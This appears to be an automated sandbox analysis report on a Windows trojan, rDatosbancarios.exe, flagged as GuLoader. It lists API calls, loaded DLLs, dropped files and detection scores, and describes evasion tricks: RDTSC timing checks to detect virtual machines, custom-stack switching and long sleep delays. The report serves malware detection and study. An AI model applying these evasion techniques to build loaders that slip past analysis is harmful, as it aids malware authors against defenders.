      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_004068466_2_00406846
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_00404C596_2_00404C59
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035B53706_2_035B5370
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035BCA086_2_035BCA08
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035BC1466_2_035BC146
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035B69A06_2_035B69A0
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035BA0886_2_035BA088
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035BC7386_2_035BC738
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035B6FC86_2_035B6FC8
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035BCFAA6_2_035BCFAA
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035B3E096_2_035B3E09
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035BC46A6_2_035BC46A
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035BCCD86_2_035BCCD8
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035B3AA16_2_035B3AA1
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035B29EC6_2_035B29EC
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_035BB0B86_2_035BB0B8
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: String function: 00402BBF appears 51 times
      Source: rDatosbancarios.exe, 00000000.00000002.2164919210.0000000000492000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedolcan.exeV vs rDatosbancarios.exe
      Source: rDatosbancarios.exe, 00000006.00000000.2163158905.0000000000492000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedolcan.exeV vs rDatosbancarios.exe
      Source: rDatosbancarios.exeBinary or memory string: OriginalFilenamedolcan.exeV vs rDatosbancarios.exe
      Source: rDatosbancarios.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal96.troj.evad.winEXE@3/21@4/4
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_004033B6
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004046DD GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046DD
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile created: C:\Users\user\skraldemndJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeMutant created: NULL
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile created: C:\Users\user\AppData\Local\Temp\nsfDE4B.tmpJump to behavior
      Source: rDatosbancarios.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: rDatosbancarios.exeVirustotal: Detection: 45%
      Source: rDatosbancarios.exeReversingLabs: Detection: 42%
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile read: C:\Users\user\Desktop\rDatosbancarios.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\rDatosbancarios.exe "C:\Users\user\Desktop\rDatosbancarios.exe"
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess created: C:\Users\user\Desktop\rDatosbancarios.exe "C:\Users\user\Desktop\rDatosbancarios.exe"
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess created: C:\Users\user\Desktop\rDatosbancarios.exe "C:\Users\user\Desktop\rDatosbancarios.exe"Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile written: C:\Users\user\skraldemnd\Foreprovided\Dowl\mikrometer.iniJump to behavior
      Source: rDatosbancarios.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.2166291651.0000000004666000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile created: C:\Users\user\AppData\Local\Temp\nsqE012.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\rDatosbancarios.exeAPI/Special instruction interceptor: Address: 48AC56F
      Source: C:\Users\user\Desktop\rDatosbancarios.exeAPI/Special instruction interceptor: Address: 2ECC56F
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\rDatosbancarios.exeRDTSC instruction interceptor: First address: 4883561 second address: 4883561 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F1E48EC27CAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\rDatosbancarios.exeRDTSC instruction interceptor: First address: 2EA3561 second address: 2EA3561 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F1E48EC4DCAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\rDatosbancarios.exeMemory allocated: 3510000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeMemory allocated: 33DD0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeMemory allocated: 33BD0000 memory reserve | memory write watchJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 600000Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599891Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599781Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599672Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599563Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599453Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599344Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599219Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 599110Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598985Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598860Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598735Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598610Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598485Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598360Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598235Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 598110Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597985Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597860Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597735Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597610Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597485Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597360Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597235Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 597110Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596985Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596860Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596735Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596610Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596485Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596360Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596235Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 596110Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595985Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595860Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595735Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595610Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595485Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595360Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595235Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 595110Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594985Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594860Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594735Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594610Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594485Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594360Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594235Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 594110Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeThread delayed: delay time: 593985Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeWindow / User API: threadDelayed 1237Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeWindow / User API: threadDelayed 8579Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsqE012.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -27670116110564310s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -600000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8788Thread sleep count: 1237 > 30Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -599891s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8788Thread sleep count: 8579 > 30Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -599781s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -599672s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -599563s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -599453s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -599344s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep count: 41 > 30Jump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -599219s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -599110s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -598985s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -598860s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -598735s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -598610s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -598485s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -598360s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -598235s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -598110s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -597985s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -597860s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -597735s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -597610s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -597485s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -597360s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -597235s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -597110s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -596985s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -596860s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -596735s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -596610s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -596485s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -596360s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -596235s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -596110s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -595985s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -595860s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -595735s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -595610s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -595485s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -595360s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -595235s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -595110s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -594985s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -594860s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -594735s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -594610s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -594485s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -594360s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exe TID: 8784Thread sleep time: -594235s >= -30000sJump to behavior
